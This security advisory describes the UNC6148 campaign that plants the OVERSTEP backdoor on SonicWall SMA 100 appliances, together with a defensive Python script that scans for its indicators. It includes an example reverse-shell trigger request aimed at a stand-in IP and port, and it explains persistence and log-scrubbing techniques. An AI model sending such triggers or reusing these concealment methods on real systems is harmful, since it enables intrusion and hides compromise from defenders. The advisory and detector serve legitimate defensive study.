SonicWall’s Secure Mobile Access (SMA) 100 series appliances, particularly those that have reached end-of-life status, are at the center of a sophisticated cyberattack campaign. This operation leverages a suspected zero-day remote code execution (RCE) vulnerability to deploy a backdoor known as OVERSTEP, culminating in the deployment of ransomware.
Attack Overview
The financially motivated threat group UNC6148 is believed to be behind this campaign. Their attack sequence initiates with the theft of administrator credentials and one-time password (OTP) seeds. Following this, they achieve full device compromise, exfiltrate sensitive data, and set the stage for ransomware deployment.
The intrusion begins with a series of HTTP requests that grant the attackers a shell on the targeted appliance, something the device should never permit. Once this shell is established, the attackers export the device’s configuration, inject malicious rules, and upload a base64-encoded binary into the persistent `/cf` partition. This binary is subsequently copied to `/usr/lib/libsamba-errors.so.6` and listed in `/etc/ld.so.preload`, so the dynamic loader injects it into every dynamically linked process at start, giving the attackers root-level control across the appliance.
Exploited Vulnerabilities
Investigations have linked the initial compromise to several longstanding SMA vulnerabilities that are frequently traded in cybercrime forums. Notably, the following vulnerabilities have been exploited in related campaigns over the past three years:
– CVE-2021-20038 (2021): A memory corruption vulnerability allowing unauthenticated remote code execution.
– CVE-2024-38475 (2024): A path traversal flaw enabling attackers to dump `temp.db` and `persist.db` files, leading to the theft of passwords and OTP seeds.
– CVE-2021-20035 (2021): A command injection vulnerability in the `/cgi-bin/sitecustomization` handler, permitting remote code execution.
– CVE-2021-20039 (2021): A command injection flaw in the `/cgi-bin/viewcert` handler, associated with the Abyss ransomware.
– CVE-2025-32819 (2025): A file deletion vulnerability that resets the built-in admin password to `password`.
These vulnerabilities have been exploited to gain unauthorized access, execute arbitrary code, and steal sensitive information from affected devices.
Persistence Mechanisms
After establishing initial access, UNC6148 ensures persistent control over the compromised devices by modifying the boot sequence. They rewrite the `bootCurrentFirmware()` routine within `/etc/rc.d/rc.fwboot`. The altered script mounts the device’s compressed initial RAM disk (`INITRD`), implants the trojanized library, and rewrites `INITRD.GZ` so that the malicious code loads before any legitimate service. The modified files are then timestamped to match the official kernel image, so metadata-based integrity checks do not flag the change.
Upon reboot, every dynamically linked binary, including the web server responsible for logging, loads the malicious library. OVERSTEP hooks functions such as `open`, `readdir`, and `write` to conceal its presence and to parse inbound buffers for trigger strings such as `dobackshell` or `dopasswords`. A simple HTTP GET request, such as `https://device/query?q=dobackshell,1.2.3.4,4444`, can trigger a reverse shell without leaving disk logs, because the hijacked `write` call strips the evidence from log data in memory before it is written.
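The persistence and trigger indicators described above can be checked from the defender's side. The following is an added example, not code from the original report or from SonicWall: it scans an extracted SMA filesystem tree (assumed to be a directory you mounted or unpacked from a disk or firmware image) for the `ld.so.preload` hook, the trojanized library path and a tampered `rc.fwboot`, and separately searches HTTP log lines for the trigger keywords. Because OVERSTEP scrubs on-device logs, the log scan is meant for upstream proxy, WAF or load-balancer logs. The fixture it builds is constructed test data; the `scan_root` and `scan_http_log` names are the author's own.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the campaign description above.
PRELOAD_LIB = "libsamba-errors.so.6"
# Trigger keyword in the query string, followed by an argument separator or end.
TRIGGER_RE = re.compile(r"[?&]q=(dobackshell|dopasswords)(?:[,&\s\"]|$)")

def scan_root(root):
    """Inspect an extracted SMA filesystem (a directory tree) for OVERSTEP traces."""
    root = Path(root)
    findings = []
    preload = root / "etc/ld.so.preload"
    if preload.is_file() and PRELOAD_LIB in preload.read_text(errors="replace"):
        findings.append(f"etc/ld.so.preload forces {PRELOAD_LIB} into every process")
    if (root / "usr/lib" / PRELOAD_LIB).is_file():
        findings.append(f"usr/lib/{PRELOAD_LIB} is present (trojanized library)")
    fwboot = root / "etc/rc.d/rc.fwboot"
    if fwboot.is_file():
        text = fwboot.read_text(errors="replace")
        # Heuristic: a stock boot script has no reason to reference the preload
        # file or the malicious library name while handling INITRD.GZ.
        if "ld.so.preload" in text or PRELOAD_LIB in text:
            findings.append("etc/rc.d/rc.fwboot references the preload hook")
    return findings

def scan_http_log(lines):
    """Return (line_no, keyword) for requests carrying an OVERSTEP trigger string."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = TRIGGER_RE.search(line)
        if m:
            hits.append((n, m.group(1)))
    return hits

def demo():
    """Build a constructed fixture (not real appliance data) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc/rc.d").mkdir(parents=True)
        (root / "usr/lib").mkdir(parents=True)
        (root / "etc/ld.so.preload").write_text(f"/usr/lib/{PRELOAD_LIB}\n")
        (root / "usr/lib" / PRELOAD_LIB).write_bytes(b"\x7fELF-constructed-stub")
        (root / "etc/rc.d/rc.fwboot").write_text(
            f"bootCurrentFirmware() {{\n  cp /cf/payload /usr/lib/{PRELOAD_LIB}\n"
            "  gzip -c initrd > INITRD.GZ\n}\n")
        fs_findings = scan_root(root)
    log = [  # constructed upstream proxy log lines
        '10.0.0.5 - - "GET /query?q=dobackshell,1.2.3.4,4444 HTTP/1.1" 200',
        '10.0.0.6 - - "GET /query?q=status HTTP/1.1" 200',
        '10.0.0.7 - - "GET /query?q=dopasswords HTTP/1.1" 200',
    ]
    return fs_findings, scan_http_log(log)
```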
Mitigation Recommendations
Organizations utilizing SonicWall SMA 100 series appliances, especially those that are end-of-life, should take immediate action to mitigate the risks associated with this campaign:
1. Apply Security Patches: Ensure that all devices are updated to the latest firmware versions that address known vulnerabilities.
2. Restrict Administrative Access: Limit access to management interfaces to trusted IP addresses and implement multi-factor authentication (MFA) to enhance security.
3. Monitor for Unusual Activity: Regularly review logs and network traffic for signs of unauthorized access or anomalous behavior.
4. Implement Network Segmentation: Isolate critical systems from potentially compromised devices to prevent lateral movement by attackers.
5. Develop an Incident Response Plan: Establish and regularly update procedures for responding to security incidents, including steps for containment, eradication, and recovery.
By proactively addressing these vulnerabilities and implementing robust security measures, organizations can reduce the risk of compromise and protect their critical assets from sophisticated cyber threats.